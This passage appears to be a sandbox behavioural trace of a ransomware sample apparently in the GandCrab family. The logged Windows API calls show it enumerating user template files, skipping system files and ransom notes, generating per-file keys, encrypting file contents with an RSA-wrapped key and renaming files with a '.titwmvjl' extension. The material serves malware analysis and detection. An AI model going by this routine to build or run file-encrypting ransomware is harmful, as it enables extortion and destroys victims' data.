\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.509] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0073.510] CloseHandle (hObject=0x2bc) returned 1 [0073.510] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.510] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.510] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x338)) [0073.510] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.511] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.511] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.511] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock") returned 82 [0073.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0073.511] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.512] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.512] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\") returned 58 [0073.512] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*" [0073.512] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503478 [0073.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.512] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.512] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.512] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.512] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.512] lstrcmpW (lpString1="Calendar insights.xltm", lpString2=".") returned 1 [0073.512] lstrcmpW (lpString1="Calendar insights.xltm", lpString2="..") returned 1 [0073.512] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Calendar insights.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" [0073.512] lstrlenW (lpString=".titwmvjl") returned 9 [0073.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0073.513] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.513] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm.titwmvjl") returned 89 [0073.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0073.513] lstrlenW (lpString=".xltm") returned 5 [0073.513] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.513] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltm ") returned 6 [0073.513] lstrcmpiW (lpString1=".xltm", lpString2=".titwmvjl") returned 1 [0073.513] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0073.513] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="desktop.ini") returned -1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="autorun.inf") returned 1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntuser.dat") returned -1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="iconcache.db") returned -1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="bootsect.bak") returned 1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="boot.ini") returned 1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntuser.dat.log") returned -1 [0073.513] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="thumbs.db") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="CRAB-DECRYPT.html") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="ntldr") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="NTDETECT.COM") returned -1 [0073.514] lstrcmpiW (lpString1="Calendar insights.xltm", lpString2="Bootfont.bin") returned 1 [0073.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm") returned 80 [0073.514] lstrlenW (lpString=".xltm") returned 5 [0073.514] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.514] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltm ") returned 6 [0073.514] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.514] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.514] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0073.515] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.515] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0073.666] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.667] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.667] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.667] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.667] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.667] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0073.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.668] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.668] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.668] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.668] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.668] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.669] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.669] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0073.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.669] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.669] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.669] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.670] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5036f8) returned 1 [0073.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.670] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.670] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.671] GetLastError () returned 0x0 [0073.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.671] CryptDestroyKey (hKey=0x5036f8) returned 1 [0073.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.671] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.671] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.671] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.672] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503978) returned 1 [0073.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.672] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.672] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.672] GetLastError () returned 0x0 [0073.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.673] CryptDestroyKey (hKey=0x503978) returned 1 [0073.673] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.673] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.673] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.673] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.673] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0xdf362, lpOverlapped=0x0) returned 1 [0073.729] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfff20c9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.729] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xdf362, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0xdf362, lpOverlapped=0x0) returned 1 [0073.737] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0073.738] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.742] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.745] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.745] CloseHandle (hObject=0x2c4) returned 1 [0073.757] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Calendar insights.xltm.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\calendar insights.xltm.titwmvjl"), dwFlags=0x1) returned 1 [0073.757] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.758] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.758] lstrcmpW (lpString1="Cashflow analysis.xltm", lpString2=".") returned 1 [0073.758] lstrcmpW (lpString1="Cashflow analysis.xltm", lpString2="..") returned 1 [0073.758] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Cashflow analysis.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" [0073.758] lstrlenW (lpString=".titwmvjl") returned 9 [0073.758] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0073.758] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.758] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm.titwmvjl") returned 89 [0073.758] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0073.758] lstrlenW (lpString=".xltm") returned 5 [0073.758] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.758] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltm ") returned 6 [0073.758] lstrcmpiW (lpString1=".xltm", lpString2=".titwmvjl") returned 1 [0073.758] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0073.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="desktop.ini") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="autorun.inf") returned 1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntuser.dat") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="iconcache.db") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="bootsect.bak") returned 1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="boot.ini") returned 1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntuser.dat.log") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="thumbs.db") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="KRAB-DECRYPT.html") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="CRAB-DECRYPT.html") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="ntldr") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="NTDETECT.COM") returned -1 [0073.759] lstrcmpiW (lpString1="Cashflow analysis.xltm", lpString2="Bootfont.bin") returned 1 [0073.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm") returned 80 [0073.759] lstrlenW (lpString=".xltm") returned 5 [0073.759] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.759] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltm ") returned 6 [0073.759] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.759] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.760] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Cashflow analysis.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\cashflow analysis.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0073.760] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.760] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0073.765] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.765] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.765] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.765] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.766] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.766] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0073.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.766] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.766] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.766] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.766] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.767] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.767] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.767] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0073.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.767] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.767] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.767] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.767] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.768] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5036f8) returned 1 [0073.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.768] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.768] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.769] GetLastError () returned 0x0 [0073.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.769] CryptDestroyKey (hKey=0x5036f8) returned 1 [0073.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.769] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.769] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.770] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034f8) returned 1 [0073.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.770] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.770] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.770] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, 